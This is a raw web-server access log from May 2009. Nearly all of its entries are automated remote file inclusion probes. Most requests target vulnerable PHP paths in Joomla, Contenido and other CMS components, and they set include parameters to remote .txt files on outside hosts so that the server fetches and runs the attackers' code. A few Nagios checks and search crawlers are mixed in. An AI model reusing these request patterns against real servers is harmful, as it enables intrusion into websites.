80.237.146.58 - - [23/May/2009:01:49:49 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:01:49:49 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:01:49:49 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
116.50.163.164 - - [23/May/2009:01:49:58 -0400] "GET /logs/access_log.Q109051200//components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
216.104.47.218 - - [23/May/2009:01:50:06 -0400] "GET /logs/access_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:12 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:12 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:12 -0400] "GET /logs/access_log.Q108081800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:12 -0400] "GET /logs/access_log.Q108052400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:15 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:15 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:15 -0400] "GET /logs/access_log.Q109050300//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:16 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:16 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:16 -0400] "GET /logs/access_log.Q108052400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:17 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:17 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:17 -0400] "GET /logs/access_log.Q108052400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:17 -0400] "GET /logs/access_log.Q108081800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:01:50:17 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:21 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:21 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:21 -0400] "GET /logs/access_log.Q108052400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:01:50:28 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:01:50:32 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:01:50:32 -0400] "GET /logs/access_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:01:50:33 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:50:44 -0400] "GET /logs/access_log.Q109050300//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:01:50:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.185.20.88 - - [23/May/2009:01:50:48 -0400] "GET /logs/access_log.Q109050300//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.125.233.222 - - [23/May/2009:01:51:17 -0400] "GET /logs/access_log.Q108073000//components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:01:51:17 -0400] "GET //components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:01:51:17 -0400] "GET /logs//components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:01:51:39 -0400] "GET /logs/access_log.Q108073000//components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:01:51:39 -0400] "GET //components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:01:51:39 -0400] "GET /logs//components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
69.248.128.84 - - [23/May/2009:01:51:44 -0400] "GET /logs/access_log.Q108110900/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.79"
69.248.128.84 - - [23/May/2009:01:51:44 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
69.248.128.84 - - [23/May/2009:01:51:46 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
216.151.134.36 - - [23/May/2009:01:51:49 -0400] "GET /logs/error_log.Q108081200//errors.php?error=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:01:51:49 -0400] "GET /logs/error_log.Q108051600//errors.php?error=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.248.128.84 - - [23/May/2009:01:52:38 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
85.125.233.222 - - [23/May/2009:01:53:31 -0400] "GET /logs/access_log.Q109051200//components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
80.237.146.58 - - [23/May/2009:01:53:46 -0400] "GET /logs/access_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.125.233.222 - - [23/May/2009:01:53:49 -0400] "GET /logs/access_log.Q109051200//components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
77.222.40.40 - - [23/May/2009:01:53:55 -0400] "GET /logs/access_log.Q108052400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:01:53:55 -0400] "GET /logs/access_log.Q108081800%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:01:53:57 -0400] "GET /logs/access_log.Q108052400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:01:53:57 -0400] "GET /logs/access_log.Q108081800%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:01:55:05 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:01:55:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.185.20.88 - - [23/May/2009:01:55:45 -0400] "GET /logs/access_log.Q108052400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:55:59 -0400] "GET /logs/access_log.Q108052400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:56:05 -0400] "GET /logs/access_log.Q108091400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:01:56:10 -0400] "GET /logs/access_log.Q108091400%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:01:56:15 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:01:56:24 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:01:56:24 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:01:57:29 -0400] "GET /logs/access_log.Q108091400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:01:58:04 -0400] "GET //?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:01:58:04 -0400] "GET /logs/access_log.Q108052400//?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:01:58:04 -0400] "GET /logs//?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 2495 "-" "Mozilla/5.0"
66.249.72.114 - - [23/May/2009:01:59:33 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L20814D481591E700A07D04K+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.222.40.40 - - [23/May/2009:01:59:55 -0400] "GET /logs/access_log.Q109050300//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:01:59:57 -0400] "GET /logs/access_log.Q109050300//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:02:00:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.248.128.84 - - [23/May/2009:02:01:30 -0400] "GET /logs/error_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
201.232.54.48 - - [23/May/2009:02:02:25 -0400] "GET /logs/access_log.Q108052400//?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:02:02:25 -0400] "GET /logs//?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 2495 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:02:02:25 -0400] "GET //?page=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
220.181.7.97 - - [23/May/2009:02:02:26 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
80.237.146.58 - - [23/May/2009:02:02:53 -0400] "GET /logs/access_log.Q108091400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
123.125.64.38 - - [23/May/2009:02:03:22 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
80.55.171.90 - - [23/May/2009:02:03:59 -0400] "GET /logs/access_log.Q108110900/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 308 "-" "libwww-perl/5.821"
80.55.171.90 - - [23/May/2009:02:04:03 -0400] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 281 "-" "libwww-perl/5.821"
80.55.171.90 - - [23/May/2009:02:04:03 -0400] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 286 "-" "libwww-perl/5.821"
80.55.171.90 - - [23/May/2009:02:04:23 -0400] "GET /logs/error_log.Q109042700/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 307 "-" "libwww-perl/5.821"
200.32.100.130 - - [23/May/2009:02:04:50 -0400] "GET /logs/access_log.Q108051700//modules/My_eGallery/public/displayCategory.php?basepath=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:02:04:50 -0400] "GET /logs/access_log.Q109050700//modules/My_eGallery/public/displayCategory.php?basepath=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:05:23 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:05:23 -0400] "GET /logs/access_log.Q109051100//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:05:23 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:05:27 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:05:27 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:05:27 -0400] "GET /logs/access_log.Q109051100//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:05:27 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:05:27 -0400] "GET /logs/access_log.Q109051100//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:05:27 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:02:05:39 -0400] "GET /index.php?cont=http://www.maliodkrywcy.pl///images/txt.html.txt??? HTTP/1.1" 404 207 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
208.113.248.144 - - [23/May/2009:02:05:39 -0400] "GET /logs/index.php?cont=http://www.maliodkrywcy.pl///images/txt.html.txt??? HTTP/1.1" 404 212 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
60.248.89.72 - - [23/May/2009:02:05:44 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.0" 404 225 "-" "Mozilla/5.0"
60.248.89.72 - - [23/May/2009:02:05:44 -0400] "GET /?sourcedir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.0" 200 409 "-" "Mozilla/5.0"
60.248.89.72 - - [23/May/2009:02:05:44 -0400] "GET /logs/?sourcedir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.0" 200 2490 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:02:05:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.185.20.88 - - [23/May/2009:02:05:52 -0400] "GET /logs/access_log.Q109050300//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:02:06:06 -0400] "GET //errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:02:06:06 -0400] "GET /logs//errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:02:06:06 -0400] "GET /logs/access_log.Q109030500%20%20//errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
60.248.89.72 - - [23/May/2009:02:06:12 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.0" 404 225 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:02:06:38 -0400] "GET /logs/access_log.Q109050300//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.55.171.90 - - [23/May/2009:02:08:33 -0400] "GET /logs/access_log.Q108110900%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 309 "-" "libwww-perl/5.821"
72.30.142.171 - - [23/May/2009:02:09:13 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.171 - - [23/May/2009:02:09:13 -0400] "GET /logs/access_log.Q108101100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.7.210.170 - - [23/May/2009:02:10:35 -0400] "GET /logs/access_log.Q109050700/shop.php?prod=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.7.210.170 - - [23/May/2009:02:10:35 -0400] "GET /shop.php?prod=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
66.7.210.170 - - [23/May/2009:02:10:35 -0400] "GET /logs/shop.php?prod=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
121.165.73.157 - - [23/May/2009:02:10:36 -0400] "GET /logs//components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
121.165.73.157 - - [23/May/2009:02:10:37 -0400] "GET //components/com_joomlalib/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
209.59.12.99 - - [23/May/2009:02:10:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.52.34.165 - - [23/May/2009:02:11:40 -0400] "GET /logs/access_log.Q108090300%20%20//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.52.34.165 - - [23/May/2009:02:11:40 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.52.34.165 - - [23/May/2009:02:11:40 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
218.52.34.165 - - [23/May/2009:02:11:57 -0400] "GET /logs/access_log.Q108090300//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:12:23 -0400] "GET //export.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:12:23 -0400] "GET /logs//export.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:12:23 -0400] "GET /logs/access_log.Q109051100//export.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:02:12:25 -0400] "GET //export.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
